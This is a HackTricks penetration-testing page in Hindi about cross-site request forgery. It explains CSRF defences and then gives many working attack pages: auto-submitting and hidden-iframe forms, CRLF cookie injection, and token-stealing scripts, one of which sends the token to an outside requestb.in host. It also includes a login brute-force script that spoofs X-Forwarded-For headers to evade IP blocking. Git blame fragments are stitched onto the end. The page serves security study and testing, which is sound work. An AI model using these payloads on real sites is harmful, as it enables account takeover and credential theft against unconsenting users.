hacktricks/pentesting-web/csrf-cross-site-request-forgery.md

# CSRF (क्रॉस साइट अनुरोध धोखाधड़ी)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>

Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking

**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights

**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!

## क्रॉस-साइट अनुरोध धोखाधड़ी (CSRF) समझाया गया

**क्रॉस-साइट अनुरोध धोखाधड़ी (CSRF)** एक प्रकार की सुरक्षा कमजोरी है जो वेब अनुप्रयोगों में पाई जाती है। यह हमलावरों को अनजान उपयोगकर्ताओं की ओर से कार्य करने की अनुमति देती है, उनके प्रमाणित सत्रों का लाभ उठाकर। यह हमला तब होता है जब एक उपयोगकर्ता, जो एक पीड़ित के प्लेटफॉर्म में लॉग इन है, एक दुर्भावनापूर्ण साइट पर जाता है। यह साइट फिर पीड़ित के खाते के लिए अनुरोधों को ट्रिगर करती है, जैसे कि जावास्क्रिप्ट को निष्पादित करना, फॉर्म सबमिट करना, या छवियों को लाना।

### CSRF हमले के लिए पूर्वापेक्षाएँ

CSRF कमजोरी का लाभ उठाने के लिए, कई शर्तें पूरी होनी चाहिए:

1. **एक मूल्यवान क्रिया की पहचान करें**: हमलावर को एक ऐसा कार्य खोजना होगा जिसका लाभ उठाया जा सके, जैसे उपयोगकर्ता का पासवर्ड, ईमेल बदलना, या विशेषाधिकार बढ़ाना।
2. **सत्र प्रबंधन**: उपयोगकर्ता का सत्र केवल कुकीज़ या HTTP बेसिक प्रमाणीकरण हेडर के माध्यम से प्रबंधित किया जाना चाहिए, क्योंकि अन्य हेडर का इस उद्देश्य के लिए हेरफेर नहीं किया जा सकता।
3. **अनपेक्षित पैरामीटर का अभाव**: अनुरोध में अनपेक्षित पैरामीटर नहीं होने चाहिए, क्योंकि वे हमले को रोक सकते हैं।

### त्वरित जांच

आप **Burp में अनुरोध कैप्चर** कर सकते हैं और CSRF सुरक्षा की जांच कर सकते हैं और ब्राउज़र से परीक्षण करने के लिए आप **Copy as fetch** पर क्लिक कर सकते हैं और अनुरोध की जांच कर सकते हैं:

<figure><img src="../.gitbook/assets/image (11) (1) (1).png" alt=""><figcaption></figcaption></figure>

### CSRF के खिलाफ रक्षा

CSRF हमलों से बचाने के लिए कई प्रतिकृतियाँ लागू की जा सकती हैं:

* [**SameSite कुकीज़**](hacking-with-cookies/#samesite): यह विशेषता ब्राउज़र को क्रॉस-साइट अनुरोधों के साथ कुकीज़ भेजने से रोकती है। [SameSite कुकीज़ के बारे में अधिक जानें](hacking-with-cookies/#samesite)।
* [**क्रॉस-उत्पत्ति संसाधन साझा करना**](cors-bypass.md): पीड़ित साइट की CORS नीति हमले की व्यवहार्यता को प्रभावित कर सकती है, विशेष रूप से यदि हमले को पीड़ित साइट से प्रतिक्रिया पढ़ने की आवश्यकता हो। [CORS बायपास के बारे में जानें](cors-bypass.md)।
* **उपयोगकर्ता सत्यापन**: उपयोगकर्ता का पासवर्ड मांगना या कैप्चा हल करना उपयोगकर्ता की मंशा की पुष्टि कर सकता है।
* **रेफरर या मूल हेडर की जांच करना**: इन हेडरों को मान्य करना यह सुनिश्चित करने में मदद कर सकता है कि अनुरोध विश्वसनीय स्रोतों से आ रहे हैं। हालाँकि, URLs को सावधानीपूर्वक तैयार करने से खराब तरीके से लागू की गई जांचों को बायपास किया जा सकता है, जैसे:
* `http://mal.net?orig=http://example.com` का उपयोग करना (URL विश्वसनीय URL के साथ समाप्त होता है)
* `http://example.com.mal.net` का उपयोग करना (URL विश्वसनीय URL के साथ शुरू होता है)
* **पैरामीटर नामों में संशोधन**: POST या GET अनुरोधों में पैरामीटर के नामों को बदलना स्वचालित हमलों को रोकने में मदद कर सकता है।
* **CSRF टोकन**: प्रत्येक सत्र में एक अद्वितीय CSRF टोकन को शामिल करना और इस टोकन की आवश्यकता करना अगले अनुरोधों में CSRF के जोखिम को काफी कम कर सकता है। टोकन की प्रभावशीलता को CORS को लागू करके बढ़ाया जा सकता है।

इन रक्षा उपायों को समझना और लागू करना वेब अनुप्रयोगों की सुरक्षा और अखंडता बनाए रखने के लिए महत्वपूर्ण है।

## रक्षा बायपास

### POST से GET

शायद जिस फॉर्म का आप दुरुपयोग करना चाहते हैं वह **CSRF टोकन के साथ POST अनुरोध भेजने के लिए तैयार है**, लेकिन आपको **जांचना चाहिए** कि क्या एक **GET** भी **मान्य** है और यदि जब आप GET अनुरोध भेजते हैं तो **CSRF टोकन अभी भी मान्य है**।

### टोकन की कमी

अनुप्रयोग एक तंत्र लागू कर सकते हैं **टोकनों को मान्य करने के लिए** जब वे मौजूद होते हैं। हालाँकि, एक कमजोरी तब उत्पन्न होती है जब टोकन के अनुपस्थित होने पर मान्यता पूरी तरह से छोड़ दी जाती है। हमलावर इस पर **टोकन ले जाने वाले पैरामीटर को हटा कर** इसका लाभ उठा सकते हैं, न कि केवल इसके मान को। इससे उन्हें मान्यता प्रक्रिया को बायपास करने और प्रभावी रूप से क्रॉस-साइट अनुरोध धोखाधड़ी (CSRF) हमले को अंजाम देने की अनुमति मिलती है।

### CSRF टोकन उपयोगकर्ता सत्र से बंधा नहीं है

अनुप्रयोग **CSRF टोकनों को उपयोगकर्ता सत्रों से नहीं बांधने** पर एक महत्वपूर्ण **सुरक्षा जोखिम** प्रस्तुत करते हैं। ये सिस्टम टोकनों को एक **वैश्विक पूल** के खिलाफ मान्य करते हैं, बजाय इसके कि प्रत्येक टोकन को आरंभिक सत्र से बंधा हो।

हमलावर इस तरह से इसका लाभ उठाते हैं:

1. **अपने खाते का उपयोग करके प्रमाणीकरण करें**।
2. **वैध CSRF टोकन प्राप्त करें** वैश्विक पूल से।
3. **इस टोकन का उपयोग करें** एक पीड़ित के खिलाफ CSRF हमले में।

यह कमजोरी हमलावरों को पीड़ित की ओर से अनधिकृत अनुरोध करने की अनुमति देती है, अनुप्रयोग के **अपर्याप्त टोकन मान्यता तंत्र** का लाभ उठाते हुए।

### विधि बायपास

यदि अनुरोध एक "**अजीब**" **विधि** का उपयोग कर रहा है, तो जांचें कि क्या **विधि** **ओवरराइड कार्यक्षमता** काम कर रही है। उदाहरण के लिए, यदि यह **PUT** विधि का उपयोग कर रहा है, तो आप **POST** विधि का उपयोग करने का प्रयास कर सकते हैं और **भेजें**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_

यह **POST अनुरोध के अंदर \_method पैरामीटर** भेजकर या **हेडर** का उपयोग करके भी काम कर सकता है:

* _X-HTTP-Method_
* _X-HTTP-Method-Override_
* _X-Method-Override_

### कस्टम हेडर टोकन बायपास

यदि अनुरोध एक **कस्टम हेडर** के साथ एक **टोकन** जोड़ रहा है जिसे **CSRF सुरक्षा विधि** के रूप में उपयोग किया जा रहा है, तो:

* **कस्टमाइज्ड टोकन और हेडर के बिना अनुरोध का परीक्षण करें।**
* **सटीक समान लंबाई लेकिन अलग टोकन** के साथ अनुरोध का परीक्षण करें।

### CSRF टोकन एक कुकी द्वारा मान्य किया गया है

अनुप्रयोग CSRF सुरक्षा को टोकन को एक कुकी और एक अनुरोध पैरामीटर में दोहराकर या एक CSRF कुकी सेट करके और यह सत्यापित करके लागू कर सकते हैं कि बैकएंड में भेजा गया टोकन कुकी के अनुरूप है। अनुप्रयोग अनुरोधों को मान्य करता है यह जांचकर कि क्या अनुरोध पैरामीटर में टोकन कुकी में मान के साथ मेल खाता है।

हालांकि, यदि वेबसाइट में ऐसी खामियाँ हैं जो हमलावर को पीड़ित के ब्राउज़र में CSRF कुकी सेट करने की अनुमति देती हैं, जैसे कि CRLF कमजोरी, तो यह विधि CSRF हमलों के प्रति संवेदनशील है। हमलावर इसका लाभ उठाकर एक धोखाधड़ी छवि लोड कर सकता है जो कुकी सेट करती है, इसके बाद CSRF हमले को शुरू कर सकता है।

नीचे एक उदाहरण है कि एक हमला कैसे संरचित किया जा सकता है:
```html
<html>
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body>
</html>

```
{% hint style="info" %}
ध्यान दें कि यदि **csrf टोकन सत्र कुकी से संबंधित है तो यह हमला काम नहीं करेगा** क्योंकि आपको पीड़ित का सत्र सेट करना होगा, और इसलिए आप खुद पर हमला कर रहे होंगे।
{% endhint %}

### Content-Type परिवर्तन

[**इस**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests) के अनुसार, **preflight** अनुरोधों से बचने के लिए **POST** विधि का उपयोग करते समय ये अनुमत Content-Type मान हैं:

* **`application/x-www-form-urlencoded`**
* **`multipart/form-data`**
* **`text/plain`**

हालांकि, ध्यान दें कि **सर्वर की लॉजिक भिन्न हो सकती है** उपयोग किए गए **Content-Type** के आधार पर, इसलिए आपको उल्लेखित मानों और अन्य जैसे **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._ का प्रयास करना चाहिए।

उदाहरण ( [यहां](https://brycec.me/posts/corctf\_2021\_challenges) से) JSON डेटा को text/plain के रूप में भेजने का:
```html
<html>
<body>
<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>
form.submit();
</script>
</body>
</html>
```
### JSON डेटा के लिए प्रीफ्लाइट अनुरोधों को बायपास करना

जब POST अनुरोध के माध्यम से JSON डेटा भेजने का प्रयास किया जाता है, तो HTML फॉर्म में `Content-Type: application/json` का उपयोग सीधे संभव नहीं है। इसी तरह, इस सामग्री प्रकार को भेजने के लिए `XMLHttpRequest` का उपयोग करने से एक प्रीफ्लाइट अनुरोध शुरू होता है। फिर भी, इस सीमा को बायपास करने और यह जांचने के लिए रणनीतियाँ हैं कि क्या सर्वर सामग्री प्रकार की परवाह किए बिना JSON डेटा को संसाधित करता है:

1. **वैकल्पिक सामग्री प्रकार का उपयोग करें**: फॉर्म में `enctype="text/plain"` सेट करके `Content-Type: text/plain` या `Content-Type: application/x-www-form-urlencoded` का उपयोग करें। यह दृष्टिकोण परीक्षण करता है कि क्या बैकएंड डेटा का उपयोग करता है चाहे सामग्री प्रकार कुछ भी हो।
2. **सामग्री प्रकार को संशोधित करें**: प्रीफ्लाइट अनुरोध से बचने के लिए जबकि यह सुनिश्चित करते हुए कि सर्वर सामग्री को JSON के रूप में पहचानता है, आप डेटा को `Content-Type: text/plain; application/json` के साथ भेज सकते हैं। यह प्रीफ्लाइट अनुरोध को ट्रिगर नहीं करता है लेकिन यदि सर्वर को `application/json` स्वीकार करने के लिए कॉन्फ़िगर किया गया है तो इसे सही ढंग से संसाधित किया जा सकता है।
3. **SWF फ्लैश फ़ाइल का उपयोग**: एक कम सामान्य लेकिन संभव विधि में ऐसे प्रतिबंधों को बायपास करने के लिए SWF फ्लैश फ़ाइल का उपयोग करना शामिल है। इस तकनीक की गहन समझ के लिए, [इस पोस्ट](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937) को देखें।

### रेफरर / मूल जांच बायपास

**रेफरर हेडर से बचें**

ऐप्लिकेशन केवल तब 'Referer' हेडर को मान्य कर सकते हैं जब यह मौजूद हो। इस हेडर को भेजने से रोकने के लिए, निम्नलिखित HTML मेटा टैग का उपयोग किया जा सकता है:
```xml
<meta name="referrer" content="never">
```
यह सुनिश्चित करता है कि 'Referer' हेडर को छोड़ दिया गया है, जिससे कुछ अनुप्रयोगों में मान्यता जांचों को बायपास किया जा सकता है।

**Regexp बायपास**

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

Referrer द्वारा भेजे जाने वाले पैरामीटर के अंदर URL में सर्वर का डोमेन नाम सेट करने के लिए आप कर सकते हैं:
```html
<html>
<!-- Referrer policy needed to send the qury parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
</script>
</body>
</html>
```
### **HEAD विधि बायपास**

[**इस CTF लेख**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) के पहले भाग में समझाया गया है कि [Oak का स्रोत कोड](https://github.com/oakserver/oak/blob/main/router.ts#L281), एक राउटर को **HEAD अनुरोधों को GET अनुरोधों के रूप में संभालने** के लिए सेट किया गया है जिसमें कोई प्रतिक्रिया शरीर नहीं है - एक सामान्य समाधान जो Oak के लिए अद्वितीय नहीं है। HEAD reqs से निपटने के लिए एक विशिष्ट हैंडलर के बजाय, उन्हें बस **GET हैंडलर को दिया जाता है लेकिन ऐप बस प्रतिक्रिया शरीर को हटा देता है**।

इसलिए, यदि GET अनुरोध को सीमित किया जा रहा है, तो आप बस **एक HEAD अनुरोध भेज सकते हैं जिसे GET अनुरोध के रूप में संसाधित किया जाएगा**।

## **शोषण उदाहरण**

### **CSRF टोकन निकालना**

यदि एक **CSRF टोकन** को **रक्षा** के रूप में उपयोग किया जा रहा है, तो आप एक [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) भेद्यता या [**Dangling Markup**](dangling-markup-html-scriptless-injection/) भेद्यता का दुरुपयोग करके इसे **निकालने** की कोशिश कर सकते हैं।

### **HTML टैग का उपयोग करके GET**
```xml
<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available
```
अन्य HTML5 टैग जो स्वचालित रूप से GET अनुरोध भेजने के लिए उपयोग किए जा सकते हैं:
```html
<iframe src="..."></iframe>
<script src="..."></script>
<img src="..." alt="">
<embed src="...">
<audio src="...">
<video src="...">
<source src="..." type="...">
<video poster="...">
<link rel="stylesheet" href="...">
<object data="...">
<body background="...">
<div style="background: url('...');"></div>
<style>
body { background: url('...'); }
</style>
<bgsound src="...">
<track src="..." kind="subtitles">
<input type="image" src="..." alt="Submit Button">
```
### फ़ॉर्म GET अनुरोध
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form method="GET" action="https://victim.net/email/change-email">
<input type="hidden" name="email" value="some@email.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
### फ़ॉर्म POST अनुरोध
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
</form>
<script>
document.forms[0].submit(); //Way 3 to autosubmit
</script>
</body>
</html>
```
### iframe के माध्यम से फ़ॉर्म POST अनुरोध
```html
<!--
The request is sent through the iframe withuot reloading the page
-->
<html>
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
### **Ajax POST अनुरोध**
```html
<script>
var xh;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
</script>

<script>
//JQuery version
$.ajax({
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
})
</script>
```
### multipart/form-data POST अनुरोध
```javascript
myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
});
```
### multipart/form-data POST अनुरोध v2
```javascript
// https://www.exploit-db.com/exploits/20009
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
//  MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";

//xhr.send(body);
xhr.sendAsBinary(body);
```
### एक iframe के भीतर Form POST अनुरोध
```html
<--! expl.html -->

<body onload="envia()">
<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<body>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>

<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000">
</iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
```
### **CSRF टोकन चुराएं और एक POST अनुरोध भेजें**
```javascript
function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;

// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
//console.log(xhr.responseText);
}
}

xhr.send("token=" + token + "&otherparama=heyyyy");
}

function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}

var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();
```
### **CSRF टोकन चुराएं और iframe, एक फॉर्म और Ajax का उपयोग करके एक पोस्ट अनुरोध भेजें**
```html
<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>

<script type="text/javascript">
function f1(){
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;

document.getElementById("token").value=t;
document.getElementById("form1").submit();
}
</script>
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
```
### **CSRF टोकन चुराएं और iframe और एक फॉर्म का उपयोग करके एक POST अनुरोध भेजें**
```html
<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>

<script>
function read()
{
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php"  enctype="multipart/form-data">');
document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
document.writeln('</form>');
document.forms[0].submit.click();
}
</script>
```
### **टोकन चुराएं और इसे 2 iframes का उपयोग करके भेजें**
```html
<script>
var token;
function readframe1(){
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
}
function loadframe2(){
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
}
</script>

<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>

<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>
```
### **POSTAjax के साथ CSRF टोकन चुराएं और एक फॉर्म के साथ पोस्ट भेजें**
```html
<body onload="getData()">

<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>

<script>
var x = new XMLHttpRequest();
function getData() {
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
}
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
}
</script>
```
### CSRF with Socket.IO
```html
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');

const username = 'admin'

socket.on('connect', () => {
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})

});
</script>
```
## CSRF लॉगिन ब्रूट फोर्स

कोड का उपयोग CSRF टोकन का उपयोग करके एक लॉगिन फॉर्म को ब्रूट फोर्स करने के लिए किया जा सकता है (यह संभावित IP ब्लैकलिस्टिंग को बायपास करने के लिए X-Forwarded-For हेडर का भी उपयोग कर रहा है):
```python
import request
import re
import random

URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"

def init_session():
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie

def login(user, password):
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True

with open(PASS_LIST, "r") as f:
for line in f:
login(USER, line.strip())
```
## Tools <a href="#tools" id="tools"></a>

* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
* [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)

## References

* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
* [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
* [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses)
* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)


<figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>

अनुभवी हैकर्स और बग बाउंटी शिकारियों के साथ संवाद करने के लिए [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों!

**Hacking Insights**\
हैकिंग के रोमांच और चुनौतियों में गहराई से जाने वाले सामग्री के साथ जुड़ें

**Real-Time Hack News**\
तेज-तर्रार हैकिंग दुनिया के साथ वास्तविक समय की समाचार और अंतर्दृष्टि के माध्यम से अद्यतित रहें

**Latest Announcements**\
नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफ़ॉर्म अपडेट के साथ सूचित रहें

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!

{% hint style="success" %}
AWS Hacking सीखें और अभ्यास करें:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking सीखें और अभ्यास करें: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जांच करें!
* **💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या **Twitter** 🐦 पर हमें **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **हैकिंग ट्रिक्स साझा करें और** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिटहब रिपोजिटरी में PR सबमिट करें।

</details>
{% endhint %}
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								# CSRF (क्रॉस साइट अनुरोध धोखाधड़ी)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								{% hint style="success" %}
-												Translated ['binary-exploitation/libc-heap/README.md', 'binary-exploitat

											
										
										
											2024-09-16 20:58:22 +00:00
+								Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								<summary>Support HackTricks</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
